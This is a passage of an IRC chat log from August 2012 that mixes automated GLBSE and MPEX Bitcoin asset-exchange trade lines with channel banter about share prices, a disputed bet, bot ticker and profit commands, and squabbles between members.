= 0.3369 BTC [-] Aug 15 15:21:17 [GLBSE] [GIGAMINING] 4 @ 1.0201 = 4.0804 BTC [+] Aug 15 15:21:19 [GLBSE] [GIGAMINING] 16 @ 1.02 = 16.32 BTC [-] Aug 15 15:23:39 [GLBSE] [HYDRO.BONDS] 13 @ 1.46 = 18.98 BTC [-] Aug 15 15:24:34 [GLBSE] [GIGAMINING] 4 @ 1.02 = 4.08 BTC [-] Aug 15 15:26:09 [GLBSE] [HYDRO.BONDS] 2 @ 1.46 = 2.92 BTC [-] Aug 15 15:38:41 [GLBSE] [NYAN.C] 1 @ 1.068 BTC [+] Aug 15 15:39:11 [GLBSE] [NYAN.C] 4 @ 1.069 = 4.276 BTC [+] Aug 15 15:44:29 it's the bullion effect Aug 15 15:46:00 but for bitcoins Aug 15 15:49:18 [GLBSE] [DMC] 75 @ 0.05899999 = 4.425 BTC [+] Aug 15 15:50:59 [MPEX] [S.MPOE] 6100 @ 0.00039322 = 2.3986 BTC [-] Aug 15 15:57:23 [GLBSE] [YABIF] 1 @ 1 BTC [-] Aug 15 15:58:39 [GLBSE] [ASICMINER] 7 @ 0.104 = 0.728 BTC [-] Aug 15 15:58:41 [GLBSE] [ASICMINER] 7 @ 0.1035 = 0.7245 BTC [-] Aug 15 15:58:42 [GLBSE] [ASICMINER] 4 @ 0.103 = 0.412 BTC [-] Aug 15 15:58:44 [GLBSE] [ASICMINER] 20 @ 0.1023 = 2.046 BTC [-] Aug 15 15:58:45 [GLBSE] [ASICMINER] 5 @ 0.102 = 0.51 BTC [-] Aug 15 15:58:46 [GLBSE] [ASICMINER] 50 @ 0.10100001 = 5.05 BTC [-] Aug 15 15:58:47 [GLBSE] [ASICMINER] 18 @ 0.1001 = 1.8018 BTC [-] Aug 15 15:58:49 [GLBSE] [ASICMINER] 289 @ 0.1 = 28.9 BTC [-] Aug 15 15:58:50 huhu Aug 15 15:59:14 ASICMINER shares anyone? Aug 15 15:59:53 I really want a GLBSE app for android :( Aug 15 16:00:17 ill takes asicminer of 0.1 Aug 15 16:00:31 for Aug 15 16:01:03 Kako sure how many? Aug 15 16:01:23 ciuciu why don't you PM him Aug 15 16:01:37 o Aug 15 16:01:39 well Aug 15 16:01:49 [MPEX] [S.MPOE] 5300 @ 0.0003965 = 2.1015 BTC [+] Aug 15 16:02:02 maybe you should use your 1k btc for your mining coop Aug 15 16:02:20 or give it to me? I am always a fan of charity xD Aug 15 16:04:01 lol Aug 15 16:04:25 i get no benefit from gigamining being traded Aug 15 16:04:49 i fulfill the contract as written Aug 15 16:05:19 [GLBSE] [BITBOND] 6 @ 0.3999 = 2.3994 BTC [-] Aug 15 16:05:30 no Aug 15 16:05:42 haha nah xD I was just joking, I am fine Aug 15 16:05:51 i don't keep up with sock puppet accounts on the forums Aug 15 16:08:58 [GLBSE] [PUREMINING] 1 @ 0.15 BTC [+] Aug 15 16:09:03 mpoe-pr is a sock puppet account for Mr. Popescu Aug 15 16:09:36 i don't have a sock puppet account and can speak for myself just fine Aug 15 16:09:59 [GLBSE] [DMC] 1 @ 0.058999 BTC [-] Aug 15 16:10:15 Technically a sock puppet account is created to confuse an issue Aug 15 16:10:27 I don't really think it's proper to call a -PR account a sock puppet Aug 15 16:11:19 Yeah but anyone who is anyone knows it is him Aug 15 16:11:29 it's not like he is trying to hide under an anonymous name Aug 15 16:13:07 Oh.. look Aug 15 16:13:13 Pirate lost his bet with Vandroiy Aug 15 16:13:28 https://bitcointalk.org/index.php?topic=91661.msg1013589#msg1013589 Aug 15 16:14:09 "...as long as there is advance notice of at least 30 calendar days" Aug 15 16:21:21 [GLBSE] [FPGAMINING] 2 @ 0.92 = 1.84 BTC [-] Aug 15 16:22:03 "I have no doubt that John Ciuciu citizen, working man without a dick presented identity documents found on the internet and other hard evidence, clear and indisputable fact that investors will realize the benefits Ciuciu and receive money back from Ciuciu." Aug 15 16:22:14 lol Aug 15 16:26:35 So ciuciu did you end up buying any YARR or NYAN? :) Aug 15 16:29:02 o_o Aug 15 16:29:05 So it was you :) Aug 15 16:29:46 I think I am gonna shut YARR down somehow, or sell it Aug 15 16:30:07 PPT was sold, FOO.PPPPT was sold Aug 15 16:30:08 [GLBSE] [DMC] 7 @ 0.058999 = 0.413 BTC [-] Aug 15 16:30:14 I should be able to sell YARR Aug 15 16:30:16 But.. no buyers Aug 15 16:31:01 Now that pirate lowered his rates, running YARR has become more profitable than investing in pirate. Aug 15 16:33:16 [GLBSE] [BITCOINMINV] 20 @ 0.125 = 2.5 BTC [+] Aug 15 16:39:07 [GLBSE] [BITBOND] 6 @ 0.4255 = 2.553 BTC [+] Aug 15 16:39:21 I gave somebody 77 Bitcoins in 2010 for nothing. Aug 15 16:39:34 Let's see if I can track them down today and tell them about their winnings. Aug 15 16:41:13 maybe they're heroic bitcoins, they made it through the mtgox hack, and all the later hacks Aug 15 16:41:36 yea, somebody should write a novel of bitcoin, about this one satoshi that was in ALL the scams, in all the hacks, in all of it. Aug 15 16:41:43 seems like a great premise. Aug 15 16:43:14 tHERE ARE A MILLION BITS IN THE NAKED WALLET. Aug 15 16:43:15 oops caps Aug 15 16:44:03 [GLBSE] [TYGRR.BOND-P] 5 @ 0.961 = 4.805 BTC [+] Aug 15 16:44:05 [GLBSE] [TYGRR.BOND-P] 10 @ 0.96 = 9.6 BTC [-] Aug 15 16:44:06 [GLBSE] [TYGRR.BOND-P] 5 @ 0.9532 = 4.766 BTC [-] Aug 15 16:44:08 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9531002 BTC [-] Aug 15 16:44:09 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9530002 BTC [-] Aug 15 16:44:09 [GLBSE] [TYGRR.BOND-P] 7 @ 0.952 = 6.664 BTC [-] Aug 15 16:44:10 [GLBSE] [TYGRR.BOND-P] 3 @ 0.951 = 2.853 BTC [-] Aug 15 16:44:12 [GLBSE] [TYGRR.BOND-P] 15 @ 0.950001 = 14.25 BTC [-] Aug 15 16:45:41 And this one was mine. It all started one day in 1996. This is the story of one Satoshi -- the Satoshi that knew too much. Although if one were to be intellectually honest one would have to mention that Satoshis are not sentient and can't really know anything. It's just a manner of speaking. Yes, it's reification, but there is a method to the madness. And this Satoshi had seen and done it all. Aug 15 16:45:56 [MPEX] [F.GIGA.ETF] 2500 @ 0.00109248 = 2.7312 BTC [-] Aug 15 16:45:57 [MPEX] [F.GIGA.ETF] 4100 @ 0.00108473 = 4.4474 BTC [-] Aug 15 16:45:58 [MPEX] [F.GIGA.ETF] 4616 @ 0.00107944 = 4.9827 BTC [-] Aug 15 16:45:59 [MPEX] [F.GIGA.ETF] 4000 @ 0.00107912 = 4.3165 BTC [-] Aug 15 16:46:00 [MPEX] [F.GIGA.ETF] 15000 @ 0.00107865 = 16.1798 BTC [-] Aug 15 16:46:01 [MPEX] [F.GIGA.ETF] 8558 @ 0.00107486 = 9.1987 BTC [-] Aug 15 16:46:02 [MPEX] [F.GIGA.ETF] 1100 @ 0.00107418 = 1.1816 BTC [-] Aug 15 16:46:03 [MPEX] [F.GIGA.ETF] 400 @ 0.00107311 = 0.4292 BTC [-] Aug 15 16:46:05 [MPEX] [F.GIGA.ETF] 13226 @ 0.00106687 = 14.1104 BTC [-] Aug 15 16:47:01 [MPEX] [B.MPCD.B] 1337 @ 0.001 = 1.337 BTC Aug 15 16:47:18 [MPEX] [B.MPCD.C] 1337 @ 0.001 = 1.337 BTC Aug 15 16:47:45 [MPEX] [B.MPCD.A] 1337 @ 0.001 = 1.337 BTC Aug 15 16:47:55 Five thousand miles away from Japan, in a city known as "New York", a man ordered a cup of coffee. He paid for it with a dollar. Little did he know that due to the butterfly effect, five thousand miles away from New York in a country called "Japan", a young Englishman pretending to be Japanese had come up with a genius idea. Or perhaps it was the hundredth monkey theory. The point is that the man who bought the coffee was a computer Aug 15 16:47:55 science grad who was interested in cryptography. And therefore, somehow, Satoshi Nakamoto KNEW WHAT HAD TO BE DONE. Aug 15 16:48:39 I could keep going Aug 15 16:48:48 [MPEX] [S.MPOE] 15200 @ 0.00039515 = 6.0063 BTC [-] Aug 15 16:48:50 [MPEX] [S.MPOE] 4300 @ 0.00038747 = 1.6661 BTC [-] Aug 15 16:48:51 [MPEX] [S.MPOE] 42262 @ 0.0003874 = 16.3723 BTC [-] Aug 15 16:48:52 [MPEX] [S.MPOE] 27200 @ 0.00038507 = 10.4739 BTC [-] Aug 15 16:48:53 [MPEX] [S.MPOE] 36600 @ 0.00038403 = 14.0555 BTC [-] Aug 15 16:48:55 [MPEX] [S.MPOE] 19801 @ 0.00038322 = 7.5881 BTC [-] Aug 15 16:48:56 [MPEX] [S.MPOE] 46900 @ 0.00038279 = 17.9529 BTC [-] Aug 15 16:48:57 [MPEX] [S.MPOE] 30800 @ 0.00037844 = 11.656 BTC [-] Aug 15 16:48:58 [MPEX] [S.MPOE] 56937 @ 0.00037557 = 21.3838 BTC [-] Aug 15 16:49:01 prolly works best with a plan first Aug 15 16:50:05 [MPEX] [S.MPOE] 8163 @ 0.00037557 = 3.0658 BTC [-] Aug 15 16:50:06 [MPEX] [S.MPOE] 54600 @ 0.00037538 = 20.4957 BTC [-] Aug 15 16:50:08 [MPEX] [S.MPOE] 32237 @ 0.00037532 = 12.0992 BTC [-] Aug 15 16:51:10 [GLBSE] [OBSI.HRPT] 1 @ 0.104599 BTC [+] Aug 15 16:52:59 The chapter titles following that satoshi should just be dates and how much BTC has been in all of the hacks described previously Aug 15 16:53:16 So the date goes up, and the number of BTC goes down each time Aug 15 16:57:10 [GLBSE] [GOLD] 4 @ 0.0099 = 0.0396 BTC [-] Aug 15 16:59:12 [GLBSE] [GOLD] 3 @ 0.0099 = 0.0297 BTC [-] Aug 15 17:00:43 [MPEX] [S.MPOE] 12265 @ 0.00037532 = 4.6033 BTC [-] Aug 15 17:01:03 YARR paid! Aug 15 17:01:49 gigavps well you're one of the rare breed that can master both forum and irc. i make no such claim. Aug 15 17:02:15 the forum's too complicated for me. Aug 15 17:02:29 usagi: Yay Aug 15 17:02:37 mircea_popescu lol Aug 15 17:02:37 Yay indeed :) Aug 15 17:02:50 mircea_popescu i think you are smarter than you let on Aug 15 17:03:04 i just don't like dealing with your sock puppet Aug 15 17:03:09 haha upon ocasion that wouldn't be too hard. Aug 15 17:03:36 well so i don't see why you'd need to, you can get on irc. Aug 15 17:05:03 area you know the funny thing? Aug 15 17:05:11 YARR is profitable even if I continue to pay out 0.01 a day Aug 15 17:05:25 Maybe I should. Aug 15 17:05:31 I could probably sell shares at 2 :p Aug 15 17:06:37 [GLBSE] [YARR] 5 @ 1.49999999 = 7.5 BTC [+] Aug 15 17:06:38 [GLBSE] [YARR] 1 @ 1.5 BTC [+] Aug 15 17:06:39 Selling shares at 2 is no risk for you, so I don't see why you shouldn't Aug 15 17:06:47 I just won't buy any ;-) Aug 15 17:08:09 [MPEX] [F.GIGA.ETF] 5374 @ 0.00106687 = 5.7334 BTC [-] Aug 15 17:08:11 [MPEX] [F.GIGA.ETF] 2000 @ 0.00106208 = 2.1242 BTC [-] Aug 15 17:08:12 [MPEX] [F.GIGA.ETF] 2154 @ 0.00106008 = 2.2834 BTC [-] Aug 15 17:09:32 [GLBSE] [M.ETF] 1 @ 0.1499 BTC [-] Aug 15 17:09:41 [MPEX] [F.GIGA.ETF] 2263 @ 0.00111107 = 2.5144 BTC [+] Aug 15 17:09:42 [MPEX] [F.GIGA.ETF] 11084 @ 0.00111343 = 12.3413 BTC [+] Aug 15 17:09:44 [MPEX] [F.GIGA.ETF] 1653 @ 0.00113235 = 1.8718 BTC [+] Aug 15 17:10:12 [GLBSE] [OBSI.HRPT] 4 @ 0.102 = 0.408 BTC [-] Aug 15 17:10:13 [GLBSE] [OBSI.HRPT] 3 @ 0.10111 = 0.3033 BTC [-] Aug 15 17:10:14 [GLBSE] [OBSI.HRPT] 3 @ 0.1011 = 0.3033 BTC [-] Aug 15 17:18:15 [GLBSE] [GIGAMINING] 1 @ 1.10979999 BTC [+] Aug 15 17:24:32 [MPEX] [F.GIGA.ETF] 13646 @ 0.00106008 = 14.4659 BTC [-] Aug 15 17:24:34 [MPEX] [F.GIGA.ETF] 2054 @ 0.00104464 = 2.1457 BTC [-] Aug 15 17:39:46 [MPEX] [S.BVPS] 262 @ 0.00376708 = 0.987 BTC [-] Aug 15 17:48:34 12.50ish w00 Aug 15 17:49:36 yee Aug 15 17:51:27 !ticker dmc Aug 15 17:51:36 is it under .0001 yet? :) Aug 15 17:51:55 [GLBSE:DMC] [Bid: 0.04] [Ask: 0.05899999] [Spread: 0.01899999] [Last: 0.058999] [24hVol: 165.69368925] [7dAvg: 0.05613795] Aug 15 17:52:30 kakobrekla, can you introduce ticker for mpex ? Aug 15 17:52:40 it moved up Aug 15 17:52:51 you'd have to read http://polimedia.us/bitcoin/mpex-vwap.php, it's a json Aug 15 17:53:06 and just parse for the symbol. it allows concurrency and goes pretty fast. Aug 15 17:53:32 aww not even on. Aug 15 17:53:58 ;;later tell kakobrekla hey listen, can you introduce !ticker for mpex too ? you'd have to read http://polimedia.us/bitcoin/mpex-vwap.php, it's a json and just parse for the symbol. it allows concurrency and goes pretty fast. Aug 15 17:53:58 The operation succeeded. Aug 15 17:54:20 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9899 BTC [+] Aug 15 17:54:25 [GLBSE] [CBGB] 1 @ 0.49999999 BTC [+] Aug 15 18:01:52 [GLBSE] [FPGAMINING] 10 @ 0.872 = 8.72 BTC [-] Aug 15 18:01:53 [GLBSE] [FPGAMINING] 49 @ 0.871 = 42.679 BTC [-] Aug 15 18:04:14 [MPEX] [B.MPCD.B] 100000 @ 0.001 = 100 BTC Aug 15 18:05:45 [GLBSE] [TYGRR.BOND-P] 8 @ 0.9899 = 7.9192 BTC [+] Aug 15 18:08:03 [GLBSE] [GIGAMINING] 10 @ 1.1009 = 11.009 BTC [-] Aug 15 18:09:25 [GLBSE] [TYGRR.BOND-P] 1 @ 0.99 BTC [+] Aug 15 18:09:39 [GLBSE] [OBSI.HRPT] 2 @ 0.104599 = 0.2092 BTC [+] Aug 15 18:09:46 [GLBSE] [RAREEARTH] 33 @ 0.00900001 = 0.297 BTC [-] Aug 15 18:10:06 [GLBSE] [RAREEARTH] 92 @ 0.009 = 0.828 BTC [-] Aug 15 18:14:33 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9701 = 3.8804 BTC [-] Aug 15 18:15:51 [GLBSE] [OBSI.HRPT] 10 @ 0.104599 = 1.046 BTC [+] Aug 15 18:16:05 [GLBSE] [CIUCIU.BOND] 100 @ 0.1 = 10 BTC [+] Aug 15 18:16:48 [GLBSE] [BMF] 4 @ 0.6701 = 2.6804 BTC [-] Aug 15 18:16:50 [GLBSE] [BMF] 10 @ 0.67 = 6.7 BTC [-] Aug 15 18:16:51 [GLBSE] [BMF] 7 @ 0.65 = 4.55 BTC [-] Aug 15 18:17:14 [GLBSE] [UDN] 1 @ 0.085 BTC [-] Aug 15 18:17:14 [GLBSE] [PPT.E] 10 @ 1.23 = 12.3 BTC [+] Aug 15 18:20:05 [GLBSE] [JAH] 10 @ 0.12 = 1.2 BTC [-] Aug 15 18:21:10 [GLBSE] [IBB] 1 @ 0.64 BTC Aug 15 18:21:19 [GLBSE] [BIB.PIRATE] 2 @ 0.9999 = 1.9998 BTC [+] Aug 15 18:22:59 [GLBSE] [UDN] 14 @ 0.085 = 1.19 BTC [-] Aug 15 18:24:00 [GLBSE] [OBSI.HRPT] 6 @ 0.104599 = 0.6276 BTC [+] Aug 15 18:26:01 [GLBSE] [ZETA-MINING] 4 @ 0.1501 = 0.6004 BTC [-] Aug 15 18:26:20 [GLBSE] [ZETA-MINING] 2 @ 0.15 = 0.3 BTC [-] Aug 15 18:28:07 [GLBSE] [ZETA-MINING] 44 @ 0.1341 = 5.9004 BTC [-] Aug 15 18:28:59 [GLBSE] [NYAN.C] 6 @ 1.069 = 6.414 BTC [+] Aug 15 18:29:07 [GLBSE] [TYGRR.BOND-P] 3 @ 0.9899 = 2.9697 BTC [+] Aug 15 18:36:45 [GLBSE] [YABIF] 2 @ 1 = 2 BTC [-] Aug 15 18:39:01 15:13.19 ( usagi ) Pirate lost his bet with Vandroiy Aug 15 18:39:01 15:13.30 ( ciuciu ) Yes, I saw it. Aug 15 18:39:01 15:13.35 ( usagi ) https://bitcointalk.org/index.php?topic=91661.msg1013589#msg1013589 Aug 15 18:39:05 did he pay' Aug 15 18:41:23 nanotube Aug 15 18:41:26 whats going on Aug 15 18:43:52 nothing Aug 15 18:44:47 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9899 = 3.9596 BTC [+] Aug 15 18:44:48 [GLBSE] [TYGRR.BOND-P] 1 @ 0.99 BTC [+] Aug 15 18:44:54 well thats helpful Aug 15 18:46:25 [GLBSE] [TYGRR.BOND-P] 3 @ 0.99 = 2.97 BTC [+] Aug 15 18:49:38 haha nice way to make 100 btc nanotube :D Aug 15 18:50:16 [GLBSE] [DMC] 5 @ 0.05899999 = 0.295 BTC [+] Aug 15 18:50:22 i wonder how this will play out Aug 15 18:51:09 why is the bet lost tho ? says there interest changes are ok. Aug 15 18:51:28 I would say that both parties will aggree that the bet is still on Aug 15 18:53:02 because there was less than 30 days notice. Aug 15 18:53:44 brb, dont talk too much Aug 15 18:53:46 o that's a good point. Aug 15 18:54:18 [GLBSE] [MOORE] 3 @ 0.51439 = 1.5432 BTC [+] Aug 15 18:54:20 [GLBSE] [MOORE] 12 @ 0.51449 = 6.1739 BTC [+] Aug 15 18:55:10 [GLBSE] [JTME] 5 @ 0.99893 = 4.9947 BTC [-] Aug 15 18:55:11 [GLBSE] [JTME] 3 @ 0.99895 = 2.9969 BTC [+] Aug 15 18:55:13 [GLBSE] [JTME] 2 @ 0.99896 = 1.9979 BTC [+] Aug 15 18:55:14 [GLBSE] [JTME] 2 @ 0.99897 = 1.9979 BTC [+] Aug 15 18:55:23 continiue. Aug 15 18:55:31 did you get gribble tells ? Aug 15 18:55:40 yes, one. Aug 15 18:55:56 not home atm, will add in the following days Aug 15 18:56:07 [GLBSE] [BITBOND] 7 @ 0.4332 = 3.0324 BTC [+] Aug 15 18:56:09 [GLBSE] [BITBOND] 2 @ 0.4333 = 0.8666 BTC [+] Aug 15 18:58:25 [GLBSE] [FPGAMINING] 10 @ 0.97 = 9.7 BTC [+] Aug 15 18:58:27 [GLBSE] [FPGAMINING] 9 @ 0.975 = 8.775 BTC [+] Aug 15 18:59:11 [GLBSE] [ZETA-MINING] 4 @ 0.1799 = 0.7196 BTC [+] Aug 15 18:59:13 [GLBSE] [ZETA-MINING] 4 @ 0.18 = 0.72 BTC [+] Aug 15 18:59:14 [GLBSE] [ZETA-MINING] 33 @ 0.185 = 6.105 BTC [+] Aug 15 18:59:18 a, no rush, just wanted to see if its doable. Aug 15 18:59:59 [GLBSE] [BDT] 1 @ 1.06989999 BTC [-] Aug 15 19:00:00 [GLBSE] [BDT] 6 @ 1.06999999 = 6.42 BTC [+] Aug 15 19:00:52 [MPEX] [O.BTCUSD.C080T] 3 @ 0.34590334 = 1.0377 BTC [-] Aug 15 19:00:53 [MPEX] [O.BTCUSD.P100N] 2 @ 0.1599883 = 0.32 BTC [-] Aug 15 19:03:16 !pl ss 1 Aug 15 19:03:16 Requesting data from GLBSE (might take a while). Aug 15 19:03:43 jcpham: or wait, what did you buy at? 1.25? Aug 15 19:04:06 !pl ss 1.5 Aug 15 19:04:12 [GLBSE] [ASICMINER] 2 @ 0.10499998 = 0.21 BTC [+] Aug 15 19:04:13 Requesting data from GLBSE (might take a while). Aug 15 19:04:17 SS [1@1.5BTC] paid: 0.44535409 BTC. Last price: 1.9 BTC. Capital gain: 0.4 BTC. Total: 0.84535409 BTC. (56.4%) Aug 15 19:04:21 when glbse is slow, it really does take a while Aug 15 19:04:32 !pl Aug 15 19:04:32 !pl [@] [] Aug 15 19:04:42 !pl ss 2.2 Aug 15 19:04:43 Requesting data from GLBSE (might take a while). Aug 15 19:04:44 SS [1@2.2BTC] paid: 0.44535409 BTC. Last price: 1.9 BTC. Capital gain: -0.3 BTC. Total: 0.14535409 BTC. (6.6%) Aug 15 19:04:54 at 2.2, you may need to put in a date Aug 15 19:05:05 yeah i see Aug 15 19:05:06 neat Aug 15 19:05:26 'cause it put's in dividends too Aug 15 19:05:32 [GLBSE] [YABMC] 15 @ 0.1151 = 1.7265 BTC [-] Aug 15 19:05:33 [GLBSE] [YABMC] 4 @ 0.115 = 0.46 BTC [-] Aug 15 19:05:37 !pl mpoe.etf .1 Aug 15 19:05:38 Requesting data from GLBSE (might take a while). Aug 15 19:05:40 this is per share, right Aug 15 19:05:49 yea Aug 15 19:05:51 MPOE.ETF [1@0.1BTC] paid: 0.00852236 BTC. Last price: 1.5 BTC. Capital gain: 1.4 BTC. Total: 1.40852236 BTC. (1408.5%) Aug 15 19:05:51 [GLBSE] [BTCWEB] 2 @ 0.04 = 0.08 BTC [-] Aug 15 19:05:52 !pl Aug 15 19:05:52 !pl [@] [] Aug 15 19:05:56 that ^ Aug 15 19:06:00 is the syntax Aug 15 19:06:04 got it Aug 15 19:06:15 ^_^ see that 1400% on mpoe.etf ^_^ Aug 15 19:06:46 with dividends today, it'l go up a bit too Aug 15 19:08:56 [GLBSE] [PPT.A] 5 @ 1.167 = 5.835 BTC [+] Aug 15 19:09:55 !pl gigamining 1.5 Aug 15 19:09:55 Requesting data from GLBSE (might take a while). Aug 15 19:10:05 GIGAMINING [1@1.5BTC] paid: 0.38322596 BTC. Last price: 1.1009 BTC. Capital gain: -0.3991 BTC. Total: -0.01587404 BTC. (-1.1%) Aug 15 19:10:12 lol Aug 15 19:11:00 .wik awa Aug 15 19:11:01 "Amalgamated Wireless (Australasia), a telecommunications manufacturer" - http://en.wikipedia.org/wiki/Awa Aug 15 19:11:02 [GLBSE] [GIGAMINING] 4 @ 1.1095979 = 4.4384 BTC [+] Aug 15 19:11:14 MPOE.ETF [1@0.1BTC] paid: 0.00852236 BTC. Last price: 1.5 BTC. Capital gain: 1.4 BTC. Total: 1.40852236 BTC. (1408.5%) Aug 15 19:11:17 jeez that looks sweet Aug 15 19:11:32 i've yet to pay today's dividends too Aug 15 19:11:41 do you have the results published smickles ? Aug 15 19:12:00 and btw to whomever it may concern : i updated http://polimedia.us/bitcoin/mpex-vwap.php to publish more info Aug 15 19:12:01 yeah Aug 15 19:12:08 not just avg price in interval but also min max and volume Aug 15 19:12:13 i sent you a link, i'll get it again Aug 15 19:12:29 and also trade count. Aug 15 19:12:36 o where did you send it ? i never got it. Aug 15 19:12:38 mircea_popescu: https://bitcointalk.org/index.php?topic=67535.msg1099694#msg1099694 Aug 15 19:12:50 ty Aug 15 19:13:13 it's not unexpected that you missed it, i just hilighted you in here or #trilem (idr which) Aug 15 19:14:00 mircea_popescu: that's a nice improvement to the vwap.php Aug 15 19:14:17 seems a bit improperly named now tho Aug 15 19:14:41 or is that min/max/avg of the vwap itself? Aug 15 19:14:55 or the min/max/avg of the spot? Aug 15 19:15:19 it is improperly named now lol Aug 15 19:15:26 min/max of the spot Aug 15 19:15:45 anyway, now with trade count too Aug 15 19:15:48 and avg is still vwap? plus volume? what more could i ask for :) Aug 15 19:15:53 :) Aug 15 19:16:16 [GLBSE] [BMMO] 2 @ 0.079 = 0.158 BTC [-] Aug 15 19:16:24 cnt? /me simultaneous lol and yay Aug 15 19:16:38 "S.MPOE":{"1d":{"avg":"38387.3709", "min":"34738", "max":"39650", "vol":"1724168", "cnt":"84" }, Aug 15 19:16:43 same with 7 and 390 days. Aug 15 19:17:03 heh nice typo Aug 15 19:17:04 can you conceive of anything else might be useful ? since we've got tghe bonnet off it atm Aug 15 19:17:08 throw more wrenches in Aug 15 19:17:09 lol. 30 days. Aug 15 19:17:23 not off hand Aug 15 19:17:33 should be good for another ~6 months. Aug 15 19:17:38 lol, id in ht asset vwap json? Aug 15 19:17:38 [GLBSE] [BITCOINMINV] 27 @ 0.115 = 3.105 BTC [-] Aug 15 19:17:54 heh, yeah Aug 15 19:17:59 id in ht ? huh ? Aug 15 19:17:59 i've got a little to do Aug 15 19:18:13 mircea_popescu: it was ciuciu's suggestion Aug 15 19:18:29 s/ht/the/ Aug 15 19:18:34 lmao that nut still about ? Aug 15 19:18:42 'erry day Aug 15 19:18:54 see, this is why im for the draft. Aug 15 19:19:02 gives kids something useful to do turning rocks and painting them over. Aug 15 19:19:21 [MPEX] [S.MPOE] 5200 @ 0.0003965 = 2.0618 BTC [+] Aug 15 19:19:41 srsly, ill say this much :" the greatest thing for a dev team is to announce some change Aug 15 19:19:48 and immediately see a line going "shares up" Aug 15 19:19:55 it's like... instagratifyometer. Aug 15 19:20:09 [GLBSE] [ASICMINER] 9 @ 0.10499899 = 0.945 BTC [-] Aug 15 19:22:58 mircea_popescu: :) Aug 15 19:23:19 ciuciu: if that page is to be believed, it's right in line with typical businesses Aug 15 19:23:40 afaik, most business don't make a profit for about the first 5 years Aug 15 19:23:58 [GLBSE] [TEEK.USD] 1 @ 0.077 BTC [-] Aug 15 19:24:09 where's 2011 on that page? Aug 15 19:24:40 [GLBSE] [CIUCIU.BOND] 3 @ 0.09 = 0.27 BTC [-] Aug 15 19:25:16 [GLBSE] [OBSI.HRPT] 21 @ 0.1011 = 2.1231 BTC [-] Aug 15 19:26:00 ciuciu: he claims to have employees now, and the info you've given is years out of date :/ Aug 15 19:26:20 if you're going to be so critical of the guy, at least have good data Aug 15 19:26:27 [GLBSE] [DMC] 20 @ 0.05899999 = 1.18 BTC [+] Aug 15 19:26:56 [GLBSE] [GIGAMINING] 1 @ 1.10949789 BTC [-] Aug 15 19:27:06 [GLBSE] [ASICMINER] 10 @ 0.10499899 = 1.05 BTC [-] Aug 15 19:27:42 mircea_popescu: do you have any US GAAP / IFRS style reports for polimedia Aug 15 19:27:59 maybe then we could come to an accurate opinion of polimedia's financial state Aug 15 19:28:13 [GLBSE] [ASICMINER] 2 @ 0.10499899 = 0.21 BTC [-] Aug 15 19:28:17 why? b/c he like FEMEN? Aug 15 19:29:07 that's a nice accusation, surely you have evidence of that Aug 15 19:29:26 https://bitcointalk.org/index.php?topic=91661.msg1101853#msg1101853 Aug 15 19:30:06 woohoo nanotube Aug 15 19:30:27 also mircea_popescu, anything to add to this ciuciu fud Aug 15 19:32:22 kakobrekla: mircea_popescu has had him on ignore for a long time Aug 15 19:32:40 bah :( Aug 15 19:32:43 no fun. :( Aug 15 19:33:10 [GLBSE] [ASICMINER] 20 @ 0.10499899 = 2.1 BTC [-] Aug 15 19:33:44 kakobrekla: ciuciu claims that mircea_popescu is a content thief and a spammer and a poor businessman, basically Aug 15 19:34:18 [GLBSE] [ASICMINER] 9 @ 0.10499899 = 0.945 BTC [-] Aug 15 19:34:54 [GLBSE] [ASICMINER] 10 @ 0.10499998 = 1.05 BTC [+] Aug 15 19:35:22 ciuciu: does that say that you're involved in intersango? Aug 15 19:35:59 and bitcoin consultancy? Aug 15 19:36:01 [GLBSE] [OBSI.1MHS] 20 @ 0.05 = 1 BTC [-] Aug 15 19:36:40 oh, no, it doesn't does it Aug 15 19:37:49 [GLBSE] [MOVETO.FUND] 9 @ 1.14999999 = 10.35 BTC [+] Aug 15 19:37:51 [GLBSE] [MOVETO.FUND] 11 @ 1.15 = 12.65 BTC [+] Aug 15 19:38:11 [GLBSE] [BIB.PIRATE] 5 @ 1 = 5 BTC [+] Aug 15 19:38:50 [GLBSE] [NASTY] 10 @ 0.497 = 4.97 BTC [-] Aug 15 19:38:52 [GLBSE] [NASTY] 16 @ 0.5 = 8 BTC [+] Aug 15 19:39:15 [GLBSE] [NASTY] 1 @ 0.5 BTC [+] Aug 15 19:41:36 [GLBSE] [DMC] 17 @ 0.05899999 = 1.003 BTC [+] Aug 15 19:42:05 well Aug 15 19:42:09 i cant read romanian Aug 15 19:42:14 or whatever Aug 15 19:42:57 hmm? Aug 15 19:43:55 lol trying to stir up drama kakobrekla ? Aug 15 19:44:10 smickles mm, europe does gaap-ish things, lemme see Aug 15 19:44:23 ciuciu: so you wre involved in Bitcoin Consultancy? Aug 15 19:44:31 im always lookin for drama Aug 15 19:45:19 that sounds like a lye Aug 15 19:45:29 what about ciubond or whatever it is? Aug 15 19:45:34 smickles http://trilema.com/2012/falimentul-polimedia-srl/ there, 2011 results. the 2010 and 2009 are also published on my blog Aug 15 19:45:51 obviously the title is tongue in cheek, if that's not obvious from the text. Aug 15 19:46:09 thx mircea_popescu Aug 15 19:46:09 [GLBSE] [OBSI.HRPT] 1 @ 0.10459 BTC [+] Aug 15 19:48:02 [GLBSE] [TYGRR.BOND-P] 3 @ 0.99 = 2.97 BTC [+] Aug 15 19:48:03 heh, accounting truly is an international language Aug 15 19:48:39 well surely. Aug 15 19:48:46 and bitcointalk takes forever to load ;/ Aug 15 19:48:59 ;;getrating ciuciu Aug 15 19:48:59 WARNING: Currently not authenticated. User ciuciu, rated since Mon Jul 2 18:18:02 2012. Cumulative rating 1, from 1 total ratings. Received ratings: 1 positive, 0 negative. Sent ratings: 0 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=ciuciu Aug 15 19:49:53 content thief roflmao. ahahaha this is like accusing the state of california of being vegetable thieves. Aug 15 19:50:04 [GLBSE] [DMC] 2 @ 0.05899999 = 0.118 BTC [+] Aug 15 19:50:06 they steal all rhode island's cucumbers. Aug 15 19:50:54 oh wow, if i calc a L3 trust rating b/t me an ciuciu, it come out at 1 Aug 15 19:51:16 [GLBSE] [DMC] 22 @ 0.04 = 0.88 BTC [-] Aug 15 19:51:18 [GLBSE] [DMC] 50 @ 0.03501002 = 1.7505 BTC [-] Aug 15 19:51:19 [GLBSE] [DMC] 100 @ 0.03501001 = 3.501 BTC 